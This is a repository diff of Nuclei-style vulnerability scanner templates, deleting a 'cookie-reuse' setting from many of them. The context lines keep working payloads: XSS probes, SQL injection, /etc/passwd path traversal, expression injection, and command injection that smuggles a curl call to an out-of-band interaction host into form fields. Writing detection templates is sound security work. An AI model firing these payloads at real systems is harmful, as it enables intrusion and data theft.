GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
|
GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -63,7 +63,6 @@ http:
|
||||||
- root
|
- root
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
|
GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
|
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
|
|
||||||
date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
|
date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -37,7 +37,6 @@ http:
|
||||||
|
|
||||||
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -55,7 +55,6 @@ http:
|
||||||
GET /pages/{{randstr}}.jsp HTTP/1.1
|
GET /pages/{{randstr}}.jsp HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -49,7 +49,6 @@ http:
|
||||||
|
|
||||||
album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -47,7 +47,6 @@ http:
|
||||||
|
|
||||||
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
|
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -47,7 +47,6 @@ http:
|
||||||
|
|
||||||
{"name": "internal", "online": "true", "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"}, "group": {"memberNames": ["$\\A{3*3333}"]}}
|
{"name": "internal", "online": "true", "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"}, "group": {"memberNames": ["$\\A{3*3333}"]}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
|
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
|
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -35,7 +35,6 @@ http:
|
||||||
|
|
||||||
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
|
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -76,7 +76,6 @@ http:
|
||||||
|
|
||||||
user={{username}}&pass={{password}}&sublogin=1
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
|
@ -65,7 +65,6 @@ http:
|
||||||
|
|
||||||
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -31,7 +31,6 @@ http:
|
||||||
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1'
|
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1'
|
||||||
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
|
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -63,7 +63,6 @@ http:
|
||||||
|
|
||||||
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -46,7 +46,6 @@ http:
|
||||||
|
|
||||||
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -54,7 +54,6 @@ http:
|
||||||
password:
|
password:
|
||||||
- admin
|
- admin
|
||||||
attack: pitchfork
|
attack: pitchfork
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -36,7 +36,6 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -39,7 +39,6 @@ http:
|
||||||
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
|
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
|
|
||||||
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -37,7 +37,6 @@ http:
|
||||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -50,7 +50,6 @@ http:
|
||||||
GET /{{string}} HTTP/1.1
|
GET /{{string}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /public/css/{{randstr}}.css HTTP/1.1
|
GET /public/css/{{randstr}}.css HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
|
|
||||||
tab=checkuser&username=admin
|
tab=checkuser&username=admin
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -39,7 +39,6 @@ http:
|
||||||
GET /ext-js/index.html HTTP/1.1
|
GET /ext-js/index.html HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -46,7 +46,6 @@ http:
|
||||||
|
|
||||||
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
|
|
||||||
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -46,7 +46,6 @@ http:
|
||||||
|
|
||||||
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
|
|
||||||
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
|
|
||||||
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
|
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
|
|
||||||
searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
|
searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -64,7 +64,6 @@ http:
|
||||||
|
|
||||||
<clipermission></clipermission>
|
<clipermission></clipermission>
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: body
|
part: body
|
||||||
|
|
|
@ -51,7 +51,6 @@ http:
|
||||||
|
|
||||||
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
|
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue